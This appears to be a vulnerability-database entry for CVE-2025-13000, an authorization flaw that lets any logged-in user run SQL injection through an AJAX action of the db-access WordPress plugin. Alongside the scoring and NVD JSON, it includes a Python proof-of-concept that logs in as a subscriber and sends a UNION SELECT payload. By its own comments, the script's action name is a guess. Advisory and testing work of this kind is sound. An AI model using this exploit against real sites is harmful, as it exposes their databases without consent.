Security Vulnerability Report
中文
CVE-2025-13000 CVSS 7.7 HIGH

CVE-2025-13000

Published: 2025-12-02 06:15:45
Last Modified: 2026-01-30 20:42:11
Source: [email protected]

Description

The db-access WordPress plugin through 0.8.7 does not have authorization in an AJAX action, allowing any authenticated users, such as subscriber to perform SQLI attacks

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jimbob1953:db-access:*:*:*:*:*:wordpress:*:* - VULNERABLE
db-access WordPress plugin <= 0.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13000 PoC - WordPress db-access Plugin SQL Injection # Target: WordPress site with db-access plugin <= 0.8.7 # Authentication required: Any authenticated user (subscriber+) TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "user_password" def get_wp_session(): """Authenticate and get WordPress session""" session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'testcookie': '1' } session.post(login_url, data=login_data) return session def exploit_sqli(session): """Exploit the SQL injection vulnerability in AJAX endpoint""" ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # SQL Injection payload - extracts database version # The vulnerable parameter depends on the actual plugin implementation payload = { 'action': 'db_access_query', # Example action name 'query': "1' UNION SELECT 1,2,version(),4,5-- -", } try: response = session.post(ajax_url, data=payload, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[+] Response: {response.text[:500]}") return response.text else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return None def main(): print("[*] CVE-2025-13000 - WordPress db-access Plugin SQL Injection") print("[*] Target:", TARGET_URL) session = get_wp_session() exploit_sqli(session) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13000", "sourceIdentifier": "[email protected]", "published": "2025-12-02T06:15:45.160", "lastModified": "2026-01-30T20:42:11.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The db-access WordPress plugin through 0.8.7 does not have authorization in an AJAX action, allowing any authenticated users, such as subscriber to perform SQLI attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jimbob1953:db-access:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "0.8.7", "matchCriteriaId": "A8E87533-7D7F-41D2-88D9-1C6E68B8C5C8"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/aec53f87-6500-4c8a-925a-146be61bbabf/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.